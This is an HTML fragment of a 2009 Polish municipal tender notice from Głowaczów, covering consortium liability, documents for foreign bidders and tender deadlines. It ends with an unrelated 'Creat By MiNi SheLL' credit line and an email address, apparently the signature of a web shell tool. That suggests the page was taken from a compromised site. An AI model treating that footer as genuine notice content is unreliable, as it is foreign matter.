2.5. 	Wszyscy partnerzy będą ponosić solidarną odpowiedzialność za wykonanie umowy zgodnie z jej postanowieniami.
2.6. 	Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum. 
3. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
3.1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 1.2 - składa odpowiedni dokument wystawiony zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.2. 	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w pkt 3.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w ustawie.
4. Forma składania dokumentów:
4.1. 	Wymagane dokumenty mogą być przedstawione w formie oryginału lub kserokopii, poświadczonej przez Wykonawcę -za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glowaczow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Głowaczów, 26-903 Głowaczów, ul. Rynek 35 w pokoju nr 12 lub 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 10:00, miejsce: Urząd Gminy Głowaczów, 26-903 Głowaczów, ul. Rynek 35, pokój nr 17 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com